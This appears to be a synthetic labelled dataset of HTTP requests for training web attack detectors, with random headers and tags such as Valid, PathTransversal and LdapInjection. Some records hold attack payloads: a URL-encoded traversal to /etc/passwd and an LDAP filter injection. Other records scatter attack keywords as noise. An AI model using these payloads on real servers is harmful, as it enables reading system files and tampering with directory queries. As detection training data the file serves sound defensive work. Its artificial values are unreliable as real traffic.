~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21459
Start - Id: 1671
class: Valid
GET /yz@4_w22Oc6x-hMs4Y_/aD_13C/trJxK.@en5E/eoaleholxa/sMi7dmpV8lsc-/o.nLwxPjofeZNZxD97/ftthegowztmrZ.jpg?1e2opomdci=jxoD&wget1stdinJ_0P1b=932&atn3do=69&wewulwnhso=wp-tzOi%3D&Leeaeapeiidwnee=784506 HTTP/1.0
Host: 95.72.10.120
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1257;q=0.4, windows-1257, euc-tw;q=0.7
Accept-Encoding: gzip, gzip;q=0.8, deflate;q=0.5, identity;q=0.5
Accept-Language: ejmv-w;q=0.0, bhe-Idt;q=0.9, y-5f;q=0.6, eeaasdf-dwpfK;q=0.5, ts-ftaed;q=0.3
Cache-Control: max-stale
Client-ip: 77.199.112.25
Cookie: ut0u= ct<7nxas;iEtoaoteFt=fyudksaee;uiozwa=71546109;cirewi=sn?Jsso;Agh9s=yrro;obyetusanatnd=sZWExVxu8b
Cookie2: $Version="708"
Date: Tue, 11 Jul 06 13:43:22 UTC
ETag: "DhV-9ETQnP2kp-ZTl"
Expect: 100-continue
From: pb3eit@susdyhwa7.com
If-Modified-Since: Mon, 07 Jan 08 20:20:56 GMT
If-Unmodified-Since: Wed, 25 Nov 09 17:32:37 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Sep 09 08:52:44 CET
Max-Forwards: 932
MIME-Version: 9.8
Pragma: tt8='to5rM'
Proxy-Authorization: sesl mseen0c=dlpAam
Authorization: iblojg cls8epe=baessa
Range: 73-
Referer: /tdbaeorl/htrla09/teyet.nsf
TE: gzip;q=0.2,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 7.3; th-ro; rv:9.5.9) Gecko/57441518
UA-CPU: x86
UA-Disp: 6991,2124,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3512x868
Via: FTP/9.5 www.ayeloa.tiff, din6Tb/2.9 www.ilotosle.png
Transfer-Encoding: gzip
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 918 www.oDrh8eht.gif:495 "6reee4ateqt1g" "Tue, 13 Dec 05 16:36:28 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 3355979393710804862
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1671
Start - Id: 11953
class: Valid
GET /e6.mspx?admin5fZbodys9ff=%5CsDn&rgo=9HzkZHd7FdH&r7ehseliN5q=rgh&eutanRwrt=pche&nqkllcieic=oteEmhoer2sl&saco66eatey4Fo=570&aee8en=omdrop&Nrmo7phpdzZyS8=aqUIUVhq6r&_8.7A=Dae HTTP/1.0
Host: www.eSia9RbGoa.com
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale=67
Client-ip: 202.180.82.94
Cookie: bae7emiea7aost1=Xee;runi=086;dorrioyEsmms=d~emochaa;nSjieO=l6V5e;lehAmt1otumtSgt=au;nehnnsasolthh=hns
Cookie2: $Version="640"
Date: Sat, 28 Apr 07 20:38:04 GMT
ETag: W/"@UnJLf8nI7_9-i5"
Expect: 100-continue
From: RoReztii@imT2.gov
If-Modified-Since: Thu, 01 Oct 09 13:57:28 UTC
If-Unmodified-Since: Fri, 15 Oct 04 21:26:39 GMT
If-Match: "sbB_RTsh_s4q8cVz"
If-None-Match: "_H@0IzdBhUtd95FZ."
If-Range: "Wyl8pYyo1RylgKcR"
Max-Forwards: 482
MIME-Version: 8.1
Pragma: alson8z=giyE3
Proxy-Authorization: Digest nc=DEd6BEef
Authorization: cwexd8 owwn=Eevlse
Range: 69-9009
Referer: /tH9n/tsfpoo/9n3Je/sc10/ntedl2oo.zip
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.5 (compatible; MSIE 0.5; Solaris; qateslsj; 6tin8a)
UA-CPU: PowerPC
UA-Disp: 664,211,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 165x3870
Via: 4.4 16.63.98.26, loNovn/0.6 53.165.58.161:062
Transfer-Encoding: gzip
Upgrade: wusbau/0.4, ERt/9.6, oDsD/5.0, 4yss2/3.5, rhod/5.2
Warning: 781 www.doaiO5.html:2 "eedAwnx0wtoeziimEee" "Wed, 27 Jun 07 16:44:22 UTC"
X-Forwarded-For: 176.49.69.217
X-Serial-Number: 7861742222563
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11953
Start - Id: 16194
class: Valid
GET /lIf/style-1processing-instructionwZbrxXV/tmpcpassthruE/Ihl8o3Ytgxftto/tV/hli9skirnwr.sh?7NeeoFNtio=g%40OyBu&vodWio56e=g04bxogaohl&biIvtAmt=0&anpelh=eQ5kDTH&aie6s=91081&sajeeejrfkg=jmConeeg9tnirbdve&erenefy5d=e6qv HTTP/1.1
Host: 4.156.177.124:44
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.8, deflate, compress, identity;q=0.6
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 198.192.178.105
Cookie: OQLM=im@Tgm;owueastoohir=if.Zf;ltittZaJiao=m2.OHKIoVIEn;cni=41409;eeeu=6;nsC=hui
Cookie2: $Version="66"
Date: Tue, 24 Jul 07 22:24:49 UTC
ETag: W/"Lok98CA@TbDQ_Pl3lBv6"
Expect: ttov=si6g
From: oltae@ieknifNr4.org
If-Modified-Since: Tue, 20 Nov 07 15:46:54 UTC
If-Unmodified-Since: Wed, 17 Feb 10 14:02:51 GMT
If-Match: *
If-None-Match: "q5dCwxc5vDZ0ao@"
If-Range: Sun, 09 Apr 06 08:38:12 UTC
Max-Forwards: 45
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZmVsenphaWE6M3dydDJx
Authorization: ztoo cieErAt=Iitna
Range: 635922-
Referer: /oEhbudT/hf0m/gidnie/lbeod/amdrtyR.gif
TE: gzip;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/9.7 (X11; U; Linux i386 1.3; Mr-e2; rv:4.1.0) Gecko/68598351
UA-CPU: PowerPC
UA-Disp: 121,346,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 3.7 www.p4ax.png
Transfer-Encoding: compress
Upgrade: rwde/3.6, attru/5.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 66.190.19.60
X-Serial-Number: 81431781
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16194
Start - Id: 46360
class: PathTransversal
GET /9yg/oyeGHfvZBohcXXv5/st8eWntt/f2A@_p@8Po/7KrDsViPO5q8oijj9/s_nE_kOM2Q5lb.KAj/2kggZIe.pl?08q3b0Gs=7APZ_Ew&Sgeeqou=aqb4q-Uf86&Tept5ts3lfsnn3=9373452359&aC=gDMs&rEi=b1lniv&so6eh6ggtxWn=7811335&lXPcdlshtbhkNe=53&euna=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&uimenstnqlhdJo=aE+suianss&bteusrjhpprde=8486464113 HTTP/1.0
Host: www.abtoth.ch
Connection: Whlij
Accept: video/mpeg
Accept-Charset: us-ascii, iso-10646-ucs-2, x-mac-chinesesimp, iso-2022-jp;q=0.4
Accept-Encoding: gzip;q=0.6, compress, identity, deflate;q=0.3
Accept-Language: uttknsai-oYnoata, nt-b0nztcs;q=0.0, oTa0ur8-ehos, opAtu6t-Hekrn;q=0.7, l-ie2esee
Cache-Control: max-age=0
Client-ip: 191.28.125.93
Cookie: clnhsdjcqons1rj=in1uD5;Z-6P=inandhuhvbm)meme;mrlsevs=[:~sPjins)Ptta
Cookie2: $Version="3"
Date: Mon, 02 Oct 06 10:20:10 UTC
ETag: W/"7@bC0aVLxbOjP6v"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Thu, 25 Dec 08 09:58:03 UTC
If-Unmodified-Since: Mon, 17 Mar 08 17:53:02 CET
If-Match: *
If-None-Match: "hNxmMUZYGc5pH6V"
If-Range: Sat, 16 Dec 06 21:55:11 CET
Max-Forwards: 10
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Digest uri=/Jt8oSe/oqit/ekti/teo8.js
Range: 405245-17797
Referer: http://7qespne.st/an6kvoa/s0eso/elzt/eTt6cty.php
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: 4heyfBtrwatE
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: 3.1 196.194.220.30
Transfer-Encoding: identity
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 67.104.67.27
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46360
Start - Id: 13254
class: Valid
GET /iOY81MSEAA6fnI6M/u24/ejDClmKmnjTf/dUe1ssiGe17cai/gQ0nRCRjv5YifVI/ic5gih4rriye/ogJLiO2kC0szTi4hUa/e2E8yLBB1IRJWzGb0@4/cr9trnlsdu8nr.php?KHjuEZBhttpsKoC=oeadLitdrope&6acrc=oqaccess_logsehes&ie1rhuheEttheei=suwU80SOf9doform&gloenes=4&aetem=1545080&it=t%5Csas&dnfssgwhdytref7=uYrmyIh0GZdb&nneDeeingjwoH=t7syW9OcFTUi&vnlpsnngds=956726989&psr0akesitajeN2=452761715&02DB=uc%7EhjRgInodej5y%24hr2window.openu&usrf4R2W=le%24tyngh&ite5burndf=3626 HTTP/1.0
Host: www.eimiis5sa.be
Connection: close
Accept: video/quicktime;q=0.8, audio/basic;q=0.6, audio/*
Accept-Charset: ks_c_5601-1987, iso-2022-jp, x-mac-roman;q=0.7, utf-7;q=0.2, utf-7
Accept-Encoding: *;q=0.2
Accept-Language: d-i;q=0.2, pumbFoAn-di, rescInua-isol;q=0.4
Cache-Control: no-store
Client-ip: 189.179.134.80
Cookie: etxonekiirlnr=Tfx L
Cookie2: $Version="960"
Date: Mon, 04 Aug 08 03:22:15 UTC
ETag: "4oge8f90AyVMwUu5C"
Expect: eple=aua98
From: berlo@UooOhol.cz
If-Modified-Since: Mon, 28 Sep 09 14:51:26 UTC
If-Unmodified-Since: Sun, 07 Mar 10 17:12:10 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Jan 05 10:40:15 GMT
Max-Forwards: 2
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic eXdTM3RkdGI6d3hyZg==
Authorization: NTLM OGVyRW5hYW10NG5lNGVodGh0ZXA1b3RseWxvdm5yYWdpbkFsczFjbW5naXR6ZXN0
Range: 16-5
Referer: http://tteteAs.ch/3Bicete/ttmwlah/Cy3e.txt
TE: trailers,gzip;q=0.7
Trailer: Pragma
User-Agent: imiclCsxm
UA-CPU: MIPS
UA-Disp: 3775,063,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2344x540
Via: FTP/9.4 www.ee9tse.gif
Transfer-Encoding: gzip
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13254
Start - Id: 10184
class: Valid
GET /ctdeeohf2hZdl/hKQ/mhuItvhT/xvbscriptw7sock_streamy/ov7yRfRDi9./tja/_Hlocation0LST5F0etcA/lNaS/szcquT/dhb3.cgi?lctadIeeo64=zyhE&oii2toledea3=dUCdTF4n21a&r46-exec3TN.yTK=untswaatuuiiI%3A&a6e0aths5=%40n&egnu=3079102&dNBcOV=vig78Axlae0ee HTTP/1.0
Host: www.r47eth.st
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1255;q=0.7, x-mac-ce;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 236.107.40.218
Cookie: 5pb=qN.e3udJhI1I;te9Dnaimtihou=aali7to;tqterr57ngt=95465;ttpwatpgateJ8=2796613;q2ewairrpab8tsr=g 9ItDwinntboot.inisearut;pglnns=49771
Cookie2: $Version="50"
Date: Fri, 01 Dec 06 20:56:04 UTC
ETag: "m9YNT.vHThE98mn8"
Expect: 100-continue
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Tue, 19 Feb 08 24:48:08 GMT
If-Unmodified-Since: Fri, 19 Jun 09 01:58:36 GMT
If-Match: "JwOV-R1unHq8G.i"
If-None-Match: *
If-Range: "5ATylZ6ysEVpXMOL5AB7"
Max-Forwards: 6
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bGdwcGVvb3JlaWFqdm9ldXNva2V4MGVpbnRlb29wYmhlYQ==
Range: 0942-16,4-99538,69635-
Referer: http://www.4Nf6.cz/4tpe/nsmtsrne/Ewdpetqt/5aoec.nsf
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: cegi/8.8
UA-CPU: x86
UA-Disp: 4419,0495,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 455x2996
Via: FTP/4.1 67.152.179.165, 9.6 191.249.114.92, 0.1 www.airdotst.png
Transfer-Encoding: deflate
Upgrade: imhr/0.1, n6leen/2.1, iPhT/4.2
Warning: 883 128.255.237.86:2 "Ssnka" "Sat, 21 Feb 04 17:15:22 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 62709231
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10184
Start - Id: 26650
class: Valid
GET /e0hif7toero/L4PZVN7xmliUY45.js?o4gqa=096065 HTTP/1.0
Host: www.onupry.be
Connection: cbki
Accept: text/html
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: H-oheriee, vzrtuc-qh9oitcy;q=0.4
Cache-Control: no-transform
Client-ip: 147.232.3.64
Cookie: LhToi277=907481;5iframeRz=2493725;EFmochaPPaqNpc=197335;swbj=echo$ ;-onHAevalSzdinC6=88326;ygsesiphloa=cYiour
Cookie2: $Version="43"
Date: Mon, 14 Aug 06 08:44:28 UTC
ETag: "L4aJnRVFfw0cHS9"
Expect: 100-continue
From: ewdn@Isnohat.net
If-Modified-Since: Mon, 24 Mar 08 08:17:13 CET
If-Unmodified-Since: Sun, 12 Feb 06 22:01:18 GMT
If-Match: *
If-None-Match: "2beWEYbelAVhR35w"
If-Range: *
Max-Forwards: 4
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM bmVlcm44cm5zMGZlb3NrdG91d3NMbmloMGs2ZWFURXB0NGFldENpYzY=
Authorization: pste Tro1e=rjctt
Range: 0-8818,879-
Referer: http://www.s0iYowa.it/fnngalib/alieyobt/hmi5tnNa.asp
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: topirAz8i (0CZNuokK; mreS_kO; ubc.LyJ1; dcy5kCML)
UA-CPU: PowerPC
UA-Disp: 080,9861,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 190x433
Via: 6.1 www.taannng.css:6870
Transfer-Encoding: compress
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 971 www.nebeab.htm:1154 "Smtbrled4Tllis" 
X-Forwarded-For: 232.156.39.113
X-Serial-Number: 21651458708939157204
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26650
Start - Id: 25439
class: Valid
GET /i0wquUUPZ@kGOXxL/EeSee3og/TcebTObd/J5servicesVBLSaejMf3S/uheuAiSrcbOooei45h0x/tamiomv6luga/IbeG9JgEHlvfnodeSV/ml9owe0Rno/e9p5pshdqtb7s.html? HTTP/1.1
Host: www.ilmfeuhEo.be:9
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: euc-kr;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: scEn=a
Client-ip: 82.74.210.10
Cookie: rj1=tlesSoabsjes;xfTqto7fv=6vx;iet=d90bbRGK1;SKadmin.FJZKcusrL=?Riznetcat p7iLftp;a4=7tThtpasstde$sAn htaccesopen2
Cookie2: $Version="69"
Date: Mon, 26 Dec 05 10:47:30 UTC
ETag: W/"X-ZFUDTn73SFgF1VsMFY"
Expect: keo3Em
From: 2nOl@m8et6rtby.cz
If-Modified-Since: Thu, 10 Jul 08 22:08:24 CET
If-Unmodified-Since: Wed, 21 Apr 04 01:29:17 CET
If-Match: *
If-None-Match: "rawfdqXrXLaeMN@5"
If-Range: Thu, 19 Jan 06 17:53:45 GMT
Max-Forwards: 1751
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Oidtio d4hpsau=cst9
Authorization: NTLM VDdyU3llbTlpZ2VlY2VlN3FmZWNHYWdlZG90Y0ZuVjlIaGllZVJqYWg=
Range: -7599
Referer: http://www.hxieey1.uk/e1Eeheaa.sh
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 0.8; 19-cp; rv:0.9.0) Gecko/04842391
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 407x092
Via: 5.7 70.229.199.228
Transfer-Encoding: gzip
Upgrade: Eaqa/3.2, ndd/9.1, pel/7.0, tto1c/5.3
Warning: 691 www.wqVo.jpeg "hnwpt0H2hDiAen2r03es" "Fri, 07 Sep 07 15:10:13 GMT"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25439
Start - Id: 7110
class: Valid
PUT /o_bG1__gJL3H/rHVjQQvCSnND_@G/we1f8iFsnn/anf/aAmazi6eo8e/ue2gdexoliet6aaceesm/scoreinmadenvs/oUFWU91@lxP8SQv/ddCvDaW9x/i2_LLyW.jcS.CpekARyb/wj7iev6lhxetnaf/tGwVKw-kv.htm? HTTP/1.0
Content-Length: 241
Content-Language: ee8o
Content-Encoding: deflate
Content-Location: http://ta5czipd.ch/a7wTr2t.dll
Content-MD5: bGE2ZWdjYTlOZW5sdWhvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Nov 09 22:54:18 GMT
Last-Modified: Thu, 24 Dec 09 12:58:04 CET
Host: 163.75.116.252:51427
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: iso-8859-4, x-mac-greek;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: lwOa-ro8Driwo, 0kose-n;q=0.3, eie-jteel
Cache-Control: tHt8shwo=st5glOf
Client-ip: 7.221.173.20
Cookie: kdpy=socsot;nnepebtKm4ol=esZwjSRRo;ruc=ar;Q4UIgh@NIZU=osjfucC_Po8;dwb6thFtoiafa=eaeeyrmntihawsYnj
Cookie2: $Version="2"
Date: Sun, 13 Dec 09 10:49:09 CET
ETag: "IVVfrEBdYIrDK0ob"
Expect: ysrto=higrege;rafzTA=8ytlrnr
From: tdnn2mqg@aeMhkchG.uk
If-Modified-Since: Fri, 13 Jul 07 01:53:25 CET
If-Unmodified-Since: Wed, 15 Sep 04 09:49:28 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jun 06 22:18:56 GMT
Max-Forwards: 3
MIME-Version: 6.3
Pragma: gi=E
Proxy-Authorization: NTLM STNzaWV0aGVsc2hkcHFUQXI5cWVlcnlpZ2xsdHpiNDNuNzlvQw==
Authorization: elset e5taptt=aKdas
Range: 8-,662-4,012941-8
Referer: /oaTddt82/wfeCsda9/aaozryrl/ulot8i/t2Srtee.tar
TE: trailers,trailers
Trailer: Host
User-Agent: dhtrprxil (yzbgQi; aCFy8ku74; ol1BP3q)
UA-CPU: x86
UA-Disp: 9784,4196,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1536x3422
Via: eUen/7.5 www.84osrWf8.jpg, FTP/3.4 180.172.25.150
Transfer-Encoding: compress
Upgrade: nqriee/4.2, etbr/9.3
Warning: 248 www.susut1.tiff "4c8logelende3" 
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 9930337775098315
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oourheiIarsPel=ait483yi&dntTorhTsd=Aiew6Et&Aramtinn8wr=630&w6apravqi7etx=a2F0rLz&dol28iDo49ceo=Lis2assmlE&hLT9M5=6s1h~baccepttt&lrarstl=lsTVQTz&t2arIdrNsn=~rRs&emonso=btnnwouOrHpl&eddiodenotdspo=87&steso2sas=567&opwd=2287&cNqAPBKs=eaw)

End - Id: 7110
Start - Id: 27721
class: Valid
GET /Ensnel/tEfolahg3ehrsTgsi.tiff?iAnEent8n9ah=oAle%3Abgsoundhr-e&VTlIYkopenorA4E=+mBen+e+s+vy&ptg4ethrhmwpqen=f+&1owshutdownNusrlsxi=Q&g.YPPz@o2tE.=nn&XVPsstyle=41&aypushdre5s5t=el&4betweenshutdown1=vEpshea&QyFcwiframeJ7Y@jR=9066353&oihmmaeei0adi=a&imgIbn_0.=bowiand&wrmtiiisWlgtvt=56111&lritJetcwyaet=3felso1e%40P%3E&EneyeutbhwhU=401099 HTTP/1.0
Host: www.nrdaspsasa.org
Connection: rixal
Accept: application/zip;q=0.8, audio/x-wav, audio/*;q=0.8
Accept-Charset: x-mac-arabic, iso-2022-kr
Accept-Encoding: *;q=0.3
Accept-Language: oct-tlgrhv;q=0.4, t-mlshqEe;q=0.0, D2-metdhe0b;q=0.5
Cache-Control: max-stale=62
Client-ip: 84.162.166.23
Cookie: deoeeiao1=10449147;isstiqo=qWnlieubpMQurI;pfnhg=su5tw$eUe@tmpartiriira;dnseerxetftGp2n=mRzc;rCb@taK6tconnectFZ=ckmOzVgFB;wehr7nu3ipGkze=a5ds4erw
Cookie2: $Version="51"
Date: Sun, 21 Mar 10 11:01:07 UTC
ETag: W/".t0JuD5cq2VPleKzw14m"
Expect: 100-continue
From: mFutck@dAkrnce.ch
If-Modified-Since: Mon, 08 Mar 04 02:43:19 UTC
If-Unmodified-Since: Fri, 16 Jul 04 05:41:09 CET
If-Match: *
If-None-Match: "5kDv0rQ.iX.XzReIZ"
If-Range: Thu, 01 Nov 07 18:39:14 CET
Max-Forwards: 6256
MIME-Version: 5.7
Pragma: 0nm=oeis
Proxy-Authorization: Basic VXphczpoaHJvaWV0dA==
Authorization: Basic c0lsb2k6bmVoN1M=
Range: 243506-,-6953
Referer: /tbdeS/hokpca/deadO/Do5laD/osoutu.mpg
TE: gzip,trailers
Trailer: Connection
User-Agent: Mozilla/3.8 (compatible; MSIE 2.4; Solaris; 6aneC5pFau; sthreRtoof; 5tirwsrn)
UA-CPU: 68000
UA-Disp: 909,493,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 483x5740
Via: 1.0 13.190.59.37
Transfer-Encoding: hgasu; ok7ozea=ar8btfr
Upgrade: rue/2.0, 6eE/9.2
Warning: 045 169.228.86.134:3 "angeeriohb" 
X-Forwarded-For: 120.223.12.165
X-Serial-Number: 3296146
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27721
Start - Id: 25020
class: Valid
GET /hijiRlg/nvb/time8wf0ahrenre8atos/o@TllEurkHyx_/tM/aXz5H/4stdsoUu6eoaoojet/9rcpA_R1EBpSr/siqn34p@FAXU/m_1Pzwyz/g23ot0iigtthgn0nnn.js?ostirnAlswhhri=1emochaSwo0t&ooe=elttkw&Sa@zpassthruSllocation=66831&xh=hhcyV&kN8Du=hyK&oiaI=98774586 HTTP/1.0
Host: 185.243.110.20
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1255;q=0.7, ks_c_5601-1987, shift_jis;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 86.51.83.241
Cookie: UV.yF@=ytHmailsl group byisto dropgr;dwr=rel nsnsflg;1boue=5linkIa<a7hYlrmg TFy;cmr=r
Cookie2: $Version="2"
Date: Tue, 29 Jul 08 01:03:45 CET
ETag: W/"axFIC6TyS.bPm_4C"
Expect: eiSll=bseZesoe
From: nzwrNfc3@izathr7huy.uk
If-Modified-Since: Fri, 19 Nov 04 11:03:39 UTC
If-Unmodified-Since: Fri, 01 Jun 07 06:06:14 CET
If-Match: *
If-None-Match: "T7JX4AT2COUMxb2zx"
If-Range: Mon, 08 Mar 04 24:12:39 CET
Max-Forwards: 1395
MIME-Version: 8.5
Pragma: n=e
Proxy-Authorization: Digest opaque="lezief"
Authorization: Digest nc=C40B2b79
Range: 46-,280-2255,32588-
Referer: http://www.akdente.be/hauz/7ttRet8/coiveee.cfm
TE: trailers
Trailer: Expect
User-Agent: gNrCRiiatoehauoi4e
UA-CPU: MIPS
UA-Disp: 0119,2506,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 669x906
Via: HTTP/7.7 www.pbstth7.shtml
Transfer-Encoding: gzip
Upgrade: obsc4n/7.8, swq/1.1, ireR/7.9, aum/7.7
Warning: 922 25.148.114.39:28474 "fmaasanertcaeR" 
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 5515309896252
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25020
Start - Id: 46390
class: PathTransversal
GET /uYvqK-pDXQPf1caL4.jpeg?ealeyd=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&teig=Ifaitn%3Dn%40unph-iRb&Upwofcfsne=a6T9pxE-&eBEI32F0JlY-=faoW9+osb HTTP/1.0
Host: 212.218.240.216:09852
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: tgaf2Ta-s, ee-da;q=0.0, 7-oosaoiga, Lheg-9
Cache-Control: min-fresh=682
Client-ip: 230.204.6.13
Cookie: d2rgi4A3d=eoe?;iern0st=U9t;9jD4uHbyA=uDi.z2.tfdx
Cookie2: $Version="7"
Date: Fri, 13 Jan 06 19:06:08 UTC
ETag: "czRVU2EQu08Bd1sb"
Expect: 100-continue
From: ladasd@didtoeUsr.uk
If-Modified-Since: Fri, 16 Jul 04 01:14:50 UTC
If-Unmodified-Since: Sun, 22 Aug 04 09:23:32 UTC
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: "6wBD17ZQ.106b2-"
If-Range: Wed, 21 Jan 09 24:46:36 GMT
Max-Forwards: 8028
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest qop=la8es
Range: 724-
Referer: http://www.eotreirE.de/eooa6tOe.jsp
TE: deflate,chunked
Trailer: Cache-Control
User-Agent: 3isnre1aAoaiqh1Tht
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3216x516
Via: 5.8 www.Naoc.tiff
Transfer-Encoding: gzip
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
X-Serial-Number: 75398657
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46390
Start - Id: 38507
class: LdapInjection
GET /hhs6lmwordic7tr0/m8t2h1EhUu/EtRhao6Tiltn0aDbIfu/ceWG6SNolan6CzRHQO/v26.html?wEiyeeodhPmivyy=+oenservicestt&5tEeiLes9i=n4WEZNK66KSy&eobi9be=%29++++%28+++%7C+++%28++cn%3D*o+++%27brien*++%29%28mail+++%3D*o++%27brien*+%29&tnnafdU=r+janoye2cwnwo6&y_ONlDrf1tuR=dd&maiigqlna=nj0a3s&prbaaep=ntnss4iPTMc HTTP/1.0
Host: www.rnuyO3co.it
Connection: keep-alive
Accept: image/png, audio/basic, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: un1dius-b6s, t2ssehyl-oda
Cache-Control: no-transform
Client-ip: 83.3.20.105
Cookie: engl5sxa=cdnoOtelnetllswindow.openhu
Cookie2: $Version="388"
Date: Sat, 12 Jan 08 06:45:13 GMT
ETag: "zquZ.85zU@b08iEVA7ZH"
Expect: 100-continue
From: ufiseea@gios.org
If-Modified-Since: Mon, 25 Apr 05 02:25:32 UTC
If-Unmodified-Since: Sun, 12 Sep 04 09:08:14 CET
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "NFfENmEb00JDlZZI-cj"
If-Range: Tue, 14 Nov 06 03:17:46 GMT
Max-Forwards: 38
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM U2xkYXBicmQ2bmFDbXJzdGxlZXQxNmllck9SNmM0aWRsb2h2eHI0dWV0
Range: -087,245-62681,-648438
Referer: /s9e4/snuoE/idfu/ihdh2tsv.mp3
TE: deflate;q=0.4
